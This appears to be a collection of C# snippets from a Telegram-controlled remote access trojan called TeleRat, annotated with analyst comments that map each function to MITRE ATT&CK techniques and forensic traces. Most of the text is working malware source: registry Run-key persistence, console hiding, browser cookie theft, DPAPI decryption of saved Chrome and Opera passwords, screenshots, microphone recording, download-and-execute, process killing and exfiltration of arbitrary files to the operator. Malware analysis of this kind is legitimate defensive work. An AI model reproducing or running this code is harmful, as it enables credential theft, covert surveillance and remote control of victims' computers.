Beispiel #1
        /// <summary>
        /// Builds the operator-facing help text (one line per supported command) and
        /// sends it through TelegramSystem.SendMessage.
        /// </summary>
        // Analyst note: the whole command vocabulary is held in plain string literals here,
        // so these literals are stable static indicators when triaging a suspicious binary.
        // TelegramSystem is defined outside this excerpt.
        public static void SendCommands()
        {
            // A single concatenated literal; the text is emitted exactly as written below.
            string response =
                "/open_link|<link> - open some link in browser\n" +
                "/download_execute|<link> - download and instant open file\n" +
                "/exit - close bot\n/ddos|<ip>|<threads> - in developing" +
                "\n/GetCookieFile - get cookies from browsers\n" +
                "/GetSystem - get system specs\n" +
                "/GetProcess - get tasklist\n" +
                "/KillProcess|<process name> - kill process\n" +
                "/ls|<path> - get files and folders in <path>\n" +
                "To upload update you need to attach update\n " +
                "with caption \"/UploadUpdate\" \n" +
                "To upload file and open it you need to attach file\n " +
                "with caption \"/UploadExecute\"\n" +
                "/DownloadFile|<full path to file> - download file\n" +
                "/DownloadFolder|<full path to folder> - download files from folder in zip archive\n" +
                "/CaptureCam - get snapshot (in developing)\n/TakeScreenShot - take screenshot\n" +
                "/GetGooglePasswords - get passwords from google\n" +
                "/RecordAudio|<time in secs (5 is default)>\n" +
                "/MessageBox|<message>|<caption> - show message box\n" +
                "/OpenFile|<full path to file> - open file\n" +
                "If you wonna just send a file without execute you can simply send this file without any caption\n" +
                "If you are sending audio, photo or video file send it like a file/help - get command list";

            TelegramSystem.SendMessage(response);
        }
Beispiel #2
        /// <summary>
        /// Collects a host profile (OS product name, user name, architecture, drives, CPU,
        /// video adapter, RAM, IP and MAC addresses) and sends it as one text message
        /// through TelegramSystem.SendMessage.
        /// </summary>
        // Analyst note: this is system-information discovery (MITRE ATT&CK T1082). The
        // observable behaviour is a registry read of CurrentVersion\ProductName plus WMI
        // queries against Win32_VideoController and Win32_Processor from a process that has
        // no administrative purpose, followed by an outbound message.
        // GetMacAddress, GetIp, GetLocalIp, cMain and TelegramSystem are defined outside this excerpt.
        public static void GetSystem()
        {
            string name      = string.Empty;
            string VideoProc = string.Empty;
            string Capacity  = string.Empty;
            string procName  = string.Empty;
            string mac       = string.Empty;
            string response  = string.Empty;
            // OS product name is read from the WOW6432Node view of the registry.
            string SysVer    = (string)Registry.GetValue(@"HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion", "ProductName", null);

            GetMacAddress(out mac);
            ManagementObjectSearcher searcher2 = new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_VideoController");

            // Each iteration overwrites the previous values, so only the last adapter returned is kept.
            foreach (ManagementObject queryObj in searcher2.Get())
            {
                name      = queryObj["Caption"].ToString();
                // VideoProc and Capacity are assigned here but never added to the response below.
                VideoProc = string.Format("Семейство: {0}", queryObj["VideoProcessor"]);
                Capacity  = string.Format("Обьем: {0}", queryObj["AdapterRAM"]);
            }

            ManagementObjectSearcher mos =
                new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_Processor");

            // Same pattern: the last processor returned wins.
            foreach (ManagementObject mo in mos.Get())
            {
                procName = mo["Name"].ToString();
            }
            ComputerInfo CI  = new ComputerInfo();
            ulong        mem = ulong.Parse(CI.TotalPhysicalMemory.ToString());
            // Integer division happens before the conversion to double, so the value is
            // already a whole number when it is rounded.
            string       ram = Math.Round(Convert.ToDouble(mem / (1024 * 1024) / 1000), 0).ToString();

            // The report is assembled by repeated string concatenation.
            response += $"System [{GetIp()}] \n";
            response += "User name: " + Environment.UserName + "\n";
            response += ("OS Version: " + SysVer + "\n");
            if (cMain.Is64Bit())
            {
                response += ("OS Аrchitecture: 64bit\n");
            }
            else
            {
                // This branch has no trailing newline, unlike the 64-bit branch.
                response += ("OS Аrchitecture: 32bit");
            }
            response += ("Local drives: ");
            foreach (var loc in Environment.GetLogicalDrives())
            {
                response += (loc + " ");
            }
            response += ("\n");
            response += ("Core count: " + Environment.ProcessorCount + "\n");
            response += ("Processor name: " + procName + "\n");
            response += ("Video card: " + name + "\n");
            response += ("RAM: " + ram + " GB\n");
            response += ("\n");
            response += ("Local IP: " + GetLocalIp() + "\n");
            response += ("IP: " + GetIp() + "\n");
            response += ("MAC: " + mac + "\n");
            TelegramSystem.SendMessage(response);
        }
Beispiel #3
 /// <summary>
 /// Sends the file at <paramref name="path"/> through TelegramSystem.SendDocument, or
 /// sends a text notice when the file does not exist.
 /// </summary>
 /// <param name="path">Path of a local file; the dispatcher passes the command argument unchanged.</param>
 // Analyst note: "download" is named from the operator's side. On the host this is an
 // upload of an arbitrary local file, i.e. data exfiltration. No restriction on the path
 // is visible in this method. TelegramSystem and GetIp are defined outside this excerpt.
 public static void DownloadFile(string path)
 {
     if (File.Exists(path))
     {
         // The caption carries whatever GetIp() returns, tagging the upload with the host.
         TelegramSystem.SendDocument(path, $"DownloadFile [{GetIp()}]");
     }
     else
     {
         TelegramSystem.SendMessage($"[File downloader] File doesn't exists.");
     }
 }
Beispiel #4
        /// <summary>
        /// Captures the primary screen into a bitmap, saves it as "screen.png" and sends
        /// that file through TelegramSystem.SendDocument.
        /// </summary>
        // Analyst note: screen capture (MITRE ATT&CK T1113). "screen.png" is a relative
        // path, so it is written to the process's current directory, and this method does
        // not delete it afterwards. A leftover screen.png next to an unknown executable is
        // therefore a useful forensic artifact.
        public static void TakeScreenShot()
        {
            Graphics gr;

            // Bitmap sized to the primary screen only; other monitors are not captured here.
            Bitmap bmp = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height);

            gr = Graphics.FromImage(bmp);
            // Copy from screen origin (0,0) to bitmap origin (0,0), full bitmap size.
            gr.CopyFromScreen(0, 0, 0, 0, bmp.Size);
            bmp.Save("screen.png", ImageFormat.Png);
            TelegramSystem.SendDocument("screen.png", "[ScreenShot] Screenshot like document.");
        }
Beispiel #5
        /// <summary>
        /// Message handler registered on the bot client. Messages with an attached document
        /// are saved under %APPDATA%\BotFiles\ (and, depending on the caption, passed to
        /// Process.Start). Any other message is parsed as a text command and handed to Execute.
        /// </summary>
        // Analyst note: this is the inbound half of the command channel. Files arriving
        // here are ingress tool transfer (MITRE ATT&CK T1105). Files created under
        // %APPDATA%\BotFiles\ followed by a child process started from that location are the
        // host-side traces. bot, cmd, Execute, Functions and TelegramSystem are defined
        // outside this excerpt.
        private static async void OnTelegramMessage(object sender, Telegram.Bot.Args.MessageEventArgs e)
        {
            if (e.Message.Document != null && e.Message.Caption.Contains("/UploadUpdate"))          // TODO: implement unpacking and launching of the file. Make a working method for using the command
            {
                // path ends with the document's file name and is then created as a DIRECTORY;
                // the document itself is saved inside it under the same name.
                string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\BotFiles\\" + e.Message.Document.FileName;
                Directory.CreateDirectory(path);
                var file = await bot.GetFileAsync(e.Message.Document.FileId);

                using (var saveFile = new FileStream(path + "\\" + e.Message.Document.FileName, FileMode.Create))
                {
                    await bot.DownloadFileAsync(file.FilePath, saveFile);
                }

                // Process.Start receives the directory path created above, not the saved file.
                Process.Start(path);
            }
            else if (e.Message.Document != null && e.Message.Caption == "/UploadExecute")
            {
                // Here the directory is %APPDATA%\BotFiles\ and the file name is appended afterwards,
                // so path refers to the saved file itself.
                string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\BotFiles\\";
                Directory.CreateDirectory(path);
                path += e.Message.Document.FileName;
                var file = await bot.GetFileAsync(e.Message.Document.FileId);

                using (var saveFile = new FileStream(path, FileMode.Create))
                {
                    await bot.DownloadFileAsync(file.FilePath, saveFile);
                }

                try
                {
                    // The received file is opened/executed straight after being written.
                    Process.Start(path);
                }
                catch
                {
                    // Any failure is reduced to a generic error message; the exception is discarded.
                    TelegramSystem.SendMessage($"[ERROR] [{Functions.GetIp()}] Something wrong");
                }
            }
            else if (e.Message.Document != null)
            {
                // Document without a recognised caption: stored only, not started.
                // Same layout as the first branch (a directory named after the file, file inside it).
                string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\BotFiles\\" + e.Message.Document.FileName;
                Directory.CreateDirectory(path);
                var file = await bot.GetFileAsync(e.Message.Document.FileId);

                using (var saveFile = new FileStream(path + "\\" + e.Message.Document.FileName, FileMode.Create))
                {
                    await bot.DownloadFileAsync(file.FilePath, saveFile);
                }
            }
            else
            {
                // No document: the message text is parsed by the cmd type and dispatched.
                cmd command = new cmd(e.Message.Text);
                Execute(command);
            }
        }
Beispiel #6
        /// <summary>
        /// Lists every running process (id and lower-cased name) and sends the list as one
        /// text message through TelegramSystem.SendMessage.
        /// </summary>
        // Analyst note: process discovery (MITRE ATT&CK T1057). The output shows the operator
        // which security tools and browsers are running on the host.
        public static void GetProcess()
        {
            string  response = $"Task list {GetIp()}\n";
            // prc is created but never used in this method.
            Process prc      = new Process();

            Process[] processes = Process.GetProcesses();
            foreach (var process in processes)
            {
                response += ("ID: " + process.Id + " Name: " + process.ProcessName.ToLower() + "\n");
            }
            TelegramSystem.SendMessage(response);
        }
Beispiel #7
        /// <summary>
        /// Terminates every running process whose name matches <paramref name="processID"/>
        /// (compared case-insensitively) and sends a confirmation message for each match.
        /// </summary>
        /// <param name="processID">Despite the name, this is compared against ProcessName, not the numeric id.</param>
        // Analyst note: remote process termination lets the operator stop arbitrary programs
        // on the host. Unexpected termination of security or browser processes by an
        // unrelated user-mode process is worth alerting on.
        public static void KillProcess(string processID)  //  Close the process and send a confirmation
        {
            // prc is created but never used in this method.
            Process prc = new Process();

            Process[] processes = Process.GetProcesses();
            foreach (var process in processes)
            {
                if (process.ProcessName.ToLower() == processID.ToLower())
                {
                    // The confirmation is sent before Kill() is called, so it is sent even if Kill() then throws.
                    TelegramSystem.SendMessage($"[Process killer] Process [{processID}] has been killed!");
                    process.Kill();
                }
            }
        }
Beispiel #8
        /// <summary>
        /// Copies browser cookie stores from a fixed list of per-user paths into
        /// %APPDATA%\Bot, zips that directory with ZipFolder and sends the archive through
        /// TelegramSystem.SendDocument.
        /// </summary>
        // Analyst note: web session cookie theft (MITRE ATT&CK T1539) with local staging and
        // archiving (T1560). Detection opportunities visible in this code:
        //   - a non-browser process reading the Cookies files listed below;
        //   - KillBrowsers() being called first (defined outside this excerpt; presumably
        //     it terminates browser processes so the files are not locked - confirm);
        //   - the staging directory %APPDATA%\Bot and the archive produced by ZipFolder.
        // Stolen session cookies can outlive a password change, so response should include
        // revoking the user's active sessions, not only resetting passwords.
        public static void GetCookieAndLoginData()
        {
            string directory = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Bot";

            Directory.CreateDirectory(directory);
            KillBrowsers();
            string username = Environment.UserName;

            // Paths are hard-coded to C:\Users\<user name>; profiles stored elsewhere are not covered.
            string[] pathes =
            {
                $"C:\\Users\\{username}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies",
                $"C:\\Users\\{username}\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies",
                $"C:\\Users\\{username}\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies",
                $"C:\\Users\\{username}\\AppData\\Local\\Google\\Chrome\\User Data\\Profile 1\\Cookies",
                $"C:\\Users\\{username}\\AppData\\Local\\Microsoft\\Windows\\INetCookies",
                $"C:\\Users\\{username}\\AppData\\Local\\Microsoft\\Windows\\Cookies"
            };

            // counter indexes config.browsers in step with pathes (config is defined outside this excerpt).
            int counter = 0;

            foreach (var path in pathes)
            {
                // Debug output left in place; Main hides the console window in this excerpt.
                Console.WriteLine(path);
                Console.WriteLine(File.Exists(path));
                if (File.Exists(path))
                {
                    // Destination name is "<source name without extension> <config.browsers[counter]>".
                    Console.WriteLine(File.Exists(directory + "\\" + Path.GetFileNameWithoutExtension(path) + $" {config.browsers[counter]}"));
                    if (File.Exists(directory + "\\" + Path.GetFileNameWithoutExtension(path) + $" {config.browsers[counter]}"))
                    {
                        // A copy from an earlier run is replaced.
                        File.Delete(directory + "\\" + Path.GetFileNameWithoutExtension(path) + $" {config.browsers[counter]}");
                        File.Copy(path, directory + "\\" + Path.GetFileNameWithoutExtension(path) + $" {config.browsers[counter]}");
                    }
                    else
                    {
                        File.Copy(path, directory + "\\" + Path.GetFileNameWithoutExtension(path) + $" {config.browsers[counter]}");
                    }
                }

                // Incremented for every path examined, whether or not a file was copied.
                counter++;
            }
            string folder = ZipFolder(directory);

            // The count in the caption is the number of paths examined, not the number of files copied.
            TelegramSystem.SendDocument(folder, $"[COOKIES] Got {counter} cookies [{GetIp()}]");
        }
Beispiel #9
        /// <summary>
        /// Adds the file at <paramref name="path"/> to a new zip archive saved in the
        /// current directory as "&lt;file name without extension&gt;.zip".
        /// </summary>
        /// <param name="path">File to archive.</param>
        /// <returns>The archive path. It is returned even when archiving failed and no archive was written.</returns>
        // Analyst note: archiving of collected data before upload (MITRE ATT&CK T1560).
        // Archives are written to Environment.CurrentDirectory and are not removed by this method.
        public static string ZipFile(string path)
        {
            string pathToSave = Environment.CurrentDirectory + $"\\{Path.GetFileNameWithoutExtension(path)}" + ".zip";

            try
            {
                using (Ionic.Zip.ZipFile zip = new Ionic.Zip.ZipFile())
                {
                    // di is created but never used in this method.
                    DirectoryInfo di = new DirectoryInfo(path);
                    zip.AddFile(path);
                    zip.Save(pathToSave);
                }
            }
            catch (Exception ex)
            {
                // Failures are reported over the message channel rather than thrown to the caller.
                TelegramSystem.SendMessage($"[ZipFile ERROR] {ex.Message}");
            }
            return(pathToSave);
        }
Beispiel #10
        /// <summary>
        /// Zips the directory <paramref name="folder"/> into "&lt;config.appData&gt;\&lt;folder name&gt;.zip".
        /// </summary>
        /// <param name="folder">Directory to archive.</param>
        /// <returns>
        /// The archive path, or config.appData alone when an exception was thrown before the
        /// file name was appended.
        /// </returns>
        // Analyst note: staging archive for collected data (MITRE ATT&CK T1560). Zip files
        // named after a staging directory under config.appData are artifacts of this step.
        // config is defined outside this excerpt.
        public static string ZipFolder(string folder)
        {
            string pathToSave = config.appData;

            try
            {
                using (Ionic.Zip.ZipFile zip = new Ionic.Zip.ZipFile())
                {
                    DirectoryInfo di = new DirectoryInfo(folder);
                    // The archive is named after the last segment of the folder path.
                    pathToSave += "\\" + di.Name + ".zip";
                    zip.AddDirectory(folder);
                    zip.Save(pathToSave);
                }
            }
            catch (Exception ex)
            {
                // Failures are reported over the message channel rather than thrown to the caller.
                TelegramSystem.SendMessage($"[ZipFolder ERROR] {ex.Message}");
            }
            return(pathToSave);
        }
Beispiel #11
        /// <summary>
        /// Lists the sub-directory names and then the file names directly inside
        /// <paramref name="path"/> and sends them as one text message.
        /// </summary>
        /// <param name="path">Directory to list; the dispatcher passes the command argument unchanged.</param>
        // Analyst note: file and directory discovery (MITRE ATT&CK T1083). It gives the
        // operator a remote directory browser over any path the process can read.
        public static void GetFiles(string path)
        {
            // The header always shows the literal "D:\BotFiles\ ", whatever path was requested.
            string response = $"Files and directories [{GetIp()}] [\"D:\\BotFiles\\ \"]: \n";

            try
            {
                DirectoryInfo dir = new DirectoryInfo(path);
                foreach (var item in dir.GetDirectories())
                {
                    response += item.Name + "\n";
                }
                foreach (var item in dir.GetFiles())
                {
                    response += item.Name + "\n";
                }

                TelegramSystem.SendMessage(response);
            }
            // Errors (missing path, access denied, ...) are reported back as text.
            catch (Exception ex) { TelegramSystem.SendMessage($"[ERROR] [{GetIp()}] {ex.Message}"); }
        }
Beispiel #12
        /// <summary>
        /// Records audio from the default capture device for the requested number of seconds
        /// plus one, writes it to "&lt;config.appData&gt;\BotFiles\waveS.wav" and sends that file
        /// through TelegramSystem.SendDocument.
        /// </summary>
        /// <param name="time">Duration in seconds as text; a non-numeric value produces an error message.</param>
        // Analyst note: audio capture (MITRE ATT&CK T1123). Host-side traces are microphone
        // access by a windowless process and the fixed output file name waveS.wav, which
        // this method does not delete. waveFile and waveSource_DataAvailable are defined
        // outside this excerpt.
        public static void RecordAudio(string time = "5")
        {
            int delay;

            if (!int.TryParse(time, out delay))
            {
                TelegramSystem.SendMessage("[RecordAudio ERROR] Write correct seconds.");
            }
            else
            {
                // One extra second is added to the requested duration.
                delay += 1;
                string path = config.appData + "\\BotFiles\\waveS.wav";
                try
                {
                    WaveInEvent waveSource = new WaveInEvent();
                    //waveSource.DeviceNumber = 0;
                    // 44.1 kHz, one channel.
                    waveSource.WaveFormat = new WaveFormat(44100, 1);

                    waveSource.DataAvailable += new EventHandler <WaveInEventArgs>(waveSource_DataAvailable);

                    string tempFile = path;
                    waveFile = new WaveFileWriter(tempFile, waveSource.WaveFormat);
                    waveSource.StartRecording();
                    // The calling thread is blocked for the whole recording.
                    Thread.Sleep(delay * 1000);
                    try
                    {
                        waveSource.StopRecording();
                        // The writer is disposed before the file is sent.
                        waveFile.Dispose();
                        TelegramSystem.SendDocument(path, $"[RecordAudio {GetIp()}]");
                    }
                    catch (Exception ex) { TelegramSystem.SendMessage($"[RecordAudio ERROR] {ex.Message}"); }
                }
                catch (Exception ex)
                {
                    // Set-up failures are reported under a different tag than stop/send failures.
                    TelegramSystem.SendMessage($"[RecordSound ERROR] {ex.Message}");
                }
            }
        }
Beispiel #13
        /// <summary>
        /// Entry point: registers an autostart value under the current user's Run key,
        /// announces the host, hides the console window, installs a console-signal handler
        /// and starts receiving bot messages.
        /// </summary>
        // Analyst note: two behaviours here are standard detection points.
        //   - Persistence through HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
        //     (MITRE ATT&CK T1547.001). Registry value-set telemetry on that key (for
        //     example Sysmon event ID 13) records both the value name and the target path.
        //   - Hiding the console window with ShowWindow(handle, SW_HIDE) (T1564.003).
        // The Run value always points at the fixed path below, regardless of where the
        // running executable is actually located. config, IP, Token, bot, signalHandler,
        // ConsoleHelper, GetConsoleWindow and ShowWindow are defined outside this excerpt.
        static void Main(string[] args)
        {
            // Opened writable (second argument true). HKCU needs no elevation.
            Microsoft.Win32.RegistryKey Key =
                Microsoft.Win32.Registry.CurrentUser.OpenSubKey(
                    "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", true);

            // The first parameter is the value name.
            // The second parameter is the path to
            // this program's executable file.
            Key.SetValue(config.currProc, "D:\\BotFiles\\TeleRat.exe");
            Key.Close();

            TelegramSystem.SendMessage($"Bot [{IP}] is online");
            var handle = GetConsoleWindow();

            ShowWindow(handle, SW_HIDE);
            // HandleConsoleSignal sends the "offline" notice when a console signal arrives.
            signalHandler += HandleConsoleSignal;
            ConsoleHelper.SetSignalHandler(signalHandler, true);
            bot            = new TelegramBotClient(Token);
            bot.OnMessage += OnTelegramMessage;
            bot.StartReceiving();

            // Keeps the process alive while messages are handled on other threads.
            Console.ReadKey();
        }
Beispiel #14
        /// <summary>
        /// Dispatches one parsed command to the matching Functions method. The last executed
        /// command is stored in a text file, and a command identical to the stored one is ignored.
        /// </summary>
        /// <param name="CMD">Parsed command; ComType, ComContent and ComThreads are read here. The cmd type is defined outside this excerpt.</param>
        // Analyst note: the state file path is built as GetFolderPath(ApplicationData) +
        // "lastCMD.txt" with no separator. GetFolderPath normally returns the folder without
        // a trailing backslash, so the file ends up beside the Roaming folder with a name
        // ending in "RoaminglastCMD.txt" rather than inside it - confirm on an affected host.
        // That file holds the most recent command in clear text ("<type>|<content>") and is
        // a useful forensic artifact.
        static void Execute(cmd CMD)
        {
            string text = string.Empty;

            // Load the previously executed command, or create an empty state file.
            if (File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "lastCMD.txt"))
            {
                StreamReader reader = new StreamReader(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "lastCMD.txt");
                text = reader.ReadToEnd();
                reader.Close();
            }
            else
            {
                StreamWriter Writer = new StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "lastCMD.txt");
                Writer.AutoFlush = true;
                Writer.Close();
            }
            // A command identical to the stored one is dropped without any reply.
            if (text == CMD.ComType + "|" + CMD.ComContent)
            {
            }
            else
            {
                switch (CMD.ComType)
                {
                // Functions.OpenLink is defined outside this excerpt.
                case "/open_link":
                    if (CMD.ComContent == null)
                    {
                        TelegramSystem.SendMessage("Usage - /open_link|<link>  (without <>)");
                    }
                    else
                    {
                        Functions.OpenLink(CMD.ComContent);
                    }
                    break;

                // Functions.DownloadExecute is defined outside this excerpt.
                case "/download_execute":
                    if (CMD.ComContent == null)
                    {
                        TelegramSystem.SendMessage("Usage - /download_execute|<link>  (without <>)");
                    }
                    else
                    {
                        Functions.DownloadExecute(CMD.ComContent);
                    }
                    break;

                case "/exit":
                    Environment.Exit(0);
                    break;

                // Recognised but does nothing in this version.
                case "/ddos":
                    break;

                case "/GetCookieFile":
                    Functions.GetCookieAndLoginData();
                    break;

                case "/GetSystem":
                    Functions.GetSystem();
                    break;

                case "/GetProcess":
                    Functions.GetProcess();
                    break;

                // The caption is taken from ComThreads, i.e. the third '|'-separated field.
                case "/MessageBox":
                    if (CMD.ComContent == null || CMD.ComThreads == null)
                    {
                        TelegramSystem.SendMessage("Usage - /MessageBox|<message>|<caption>  (without <>)");
                    }
                    else
                    {
                        Functions.ShowMessageBox(CMD.ComContent, CMD.ComThreads);
                    }
                    break;

                case "/KillProcess":
                    if (CMD.ComContent == null)
                    {
                        TelegramSystem.SendMessage("Usage - /KillProcess|<process name>  (without <>)");
                    }
                    else
                    {
                        Functions.KillProcess(CMD.ComContent);
                    }
                    break;

                // Without an argument the listing defaults to the fixed directory D:\BotFiles\.
                case "/ls":
                    if (CMD.ComContent == null)
                    {
                        Functions.GetFiles("D:\\BotFiles\\");
                    }
                    else
                    {
                        Functions.GetFiles(CMD.ComContent);
                    }
                    break;

                case "/DownloadFile":
                    if (CMD.ComContent == null)
                    {
                        TelegramSystem.SendMessage("Usage - /DownloadFile|<full path to file>  (without <>)");
                    }
                    else
                    {
                        Functions.DownloadFile(CMD.ComContent);
                    }
                    break;

                // Recognised but does nothing in this version (the call is commented out).
                case "/CaptureCam":
                    //Functions.CaptureCam();                           // TODO: snapshot from the webcam
                    break;

                case "/TakeScreenShot":
                    Functions.TakeScreenShot();
                    break;

                case "/GetGooglePasswords":
                    Functions.GetGooglePasswords();                        // TODO: archive the files into a .zip archive
                    break;

                // Liveness check; the reply contains whatever Functions.GetIp() returns.
                case "/ping":
                    TelegramSystem.SendMessage($"[Ping] [{Functions.GetIp()}] I'm up");
                    break;

                // The argument is passed to Process.Start unchanged.
                case "/OpenFile":
                    if (CMD.ComContent == null)
                    {
                        TelegramSystem.SendMessage("Usage - /OpenFile|<full path to file>  (without <>)");
                    }
                    else
                    {
                        Process.Start(CMD.ComContent);
                    }
                    break;

                case "/DownloadFolder":
                    if (CMD.ComContent == null)
                    {
                        TelegramSystem.SendMessage("Usage - /DownloadFolder|<full path to folder>  (without <>)");
                    }
                    else
                    {
                        Functions.DownloadFolder(CMD.ComContent);
                    }
                    break;

                case "/help":
                    Functions.SendCommands();
                    break;

                case "/RecordAudio":
                    if (CMD.ComContent != null)
                    {
                        Functions.RecordAudio(CMD.ComContent);
                    }
                    else
                    {
                        Functions.RecordAudio();
                    }
                    break;

                // Unknown command type: the help text is sent unless the type contains an
                // entry of commandList (defined outside this excerpt).
                default:
                    int i = 1;
                    foreach (var command in commandList)
                    {
                        if (CMD.ComType.Contains(command))
                        {
                            i = 0;
                        }
                    }
                    if (i != 0)
                    {
                        Functions.SendCommands();
                    }
                    break;
                }
                // Record the command just handled so that an immediate repeat is ignored.
                StreamWriter Writer = new StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "lastCMD.txt");
                Writer.AutoFlush = true;
                Writer.Write(CMD.ComType + "|" + CMD.ComContent);
                Writer.Close();
            }
        }
Beispiel #15
 /// <summary>
 /// Console-signal callback: sends an "offline" notice and then waits 750 ms before returning.
 /// </summary>
 // Analyst note: the pause presumably gives the outgoing message time to leave before the
 // process ends - confirm. Both parameters are unused. ConsoleSignal, IP and
 // TelegramSystem are defined outside this excerpt.
 private static void HandleConsoleSignal(ConsoleSignal consoleSignal, int returnedValue)
 {
     TelegramSystem.SendMessage($"Bot [{IP}] is offline");
     Thread.Sleep(750);
 }
Beispiel #16
        /// <summary>
        /// Reads the "logins" table from a fixed list of browser credential databases,
        /// passes one column of each row to DPAPI.Decrypt, writes URL, login and password to
        /// text files under "&lt;config.appData&gt;\BotFiles\passes", then zips that directory
        /// and sends the archive through TelegramSystem.SendDocument.
        /// </summary>
        // Analyst note: credential theft from web browsers (MITRE ATT&CK T1555.003).
        // Detection and response points visible in this code:
        //   - a non-browser process opening the "Login Data" files listed below;
        //   - KillBrowsers() being called first (defined outside this excerpt);
        //   - recovered passwords are written to disk in clear text ("pass <name>.txt") and
        //     are not deleted here, so the staging directory and its zip are direct
        //     evidence of which credentials were exposed;
        //   - every credential stored in the affected profiles should be treated as
        //     compromised and rotated.
        // DPAPI, config, KillBrowsers and ZipFolder are defined outside this excerpt.
        public static void GetGooglePasswords()
        {
            string username = Environment.UserName;

            // Paths are hard-coded to C:\Users\<user name>.
            string[] pathes = { $"C:\\Users\\{username}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data",
                                $"C:\\Users\\{username}\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data",
                                $"C:\\Users\\{username}\\AppData\\Local\\Google\\Chrome\\User Data\\Profile 1\\Login Data",
                                $"C:\\Users\\{username}\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data",
                                $"C:\\Users\\{username}\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Password Checker" };
            KillBrowsers();
            try
            {
                // counter indexes config.passes in step with pathes.
                int counter = 0;
                foreach (var db_way in pathes)
                {
                    if (File.Exists(db_way))
                    {
                        Directory.CreateDirectory($"{config.appData}\\BotFiles\\passes");
                        string       filename = $"{config.appData}\\BotFiles\\passes\\pass {config.passes[counter]}.txt";
                        // Opened with append = false, so output from an earlier run is overwritten.
                        StreamWriter Writer   = new StreamWriter(filename, false, Encoding.UTF8);
                        string       db_field = "logins";
                        byte[]       entropy  = null;
                        string       description;

                        string    ConnectionString = "data source=" + db_way + ";New=True;UseUTF16Encoding=True";
                        DataTable DB  = new DataTable();
                        // The table name is a fixed literal, not external input.
                        string    sql = string.Format("SELECT * FROM {0} {1} {2}", db_field, "", "");
                        using (SQLiteConnection connect = new SQLiteConnection(ConnectionString))
                        {
                            SQLiteCommand     command = new SQLiteCommand(sql, connect);
                            SQLiteDataAdapter adapter = new SQLiteDataAdapter(command);
                            adapter.Fill(DB);
                            int rows = DB.Rows.Count;
                            for (int i = 0; i < rows; i++)
                            {
                                // Columns are read by position (1, 3, 5), so the code depends on the
                                // column order of the table; the schema itself is not visible here.
                                byte[] byteArray = (byte[])DB.Rows[i][5];
                                byte[] decrypted = DPAPI.Decrypt(byteArray, entropy, out description);
                                string password  = new UTF8Encoding(true).GetString(decrypted);
                                // Rows with neither a password nor a login are skipped.
                                if (password == string.Empty && DB.Rows[i][3].ToString().Trim() == string.Empty)
                                {
                                    continue;
                                }
                                else
                                {
                                    Writer.Write(i + 1 + ") ");                    // Here we print order number of our trinity "site-login-password"
                                    Writer.WriteLine($"URL: [{DB.Rows[i][1]}]");   // site URL
                                    Writer.WriteLine($"Login: [{DB.Rows[i][3]}]"); // login
                                    Writer.WriteLine($"Password: [{password}]");
                                    Writer.WriteLine();
                                }
                            }
                            Writer.Close();
                        }
                    }
                    counter++;
                }
                string folder = ZipFolder($"{config.appData}\\BotFiles\\passes");
                TelegramSystem.SendDocument(folder, "[Passwords] Well done!");
            }
            catch (Exception ex)
            {
                // Any failure aborts the whole run and only the exception message is reported.
                TelegramSystem.SendMessage($"[Passwords] {ex.Message}");
            }
        }
Beispiel #17
        /// <summary>
        /// Zips the directory at <paramref name="path"/> with ZipFolder and sends the
        /// resulting archive through TelegramSystem.SendDocument.
        /// </summary>
        /// <param name="path">Directory to archive; the dispatcher passes the command argument unchanged.</param>
        // Analyst note: bulk exfiltration of an arbitrary directory. The archive that
        // ZipFolder writes is not removed by this method, so it remains on disk as a record
        // of what was taken. ZipFolder's return value is sent without checking that an
        // archive was actually produced.
        public static void DownloadFolder(string path)
        {
            string zip = ZipFolder(path);

            TelegramSystem.SendDocument(zip);
        }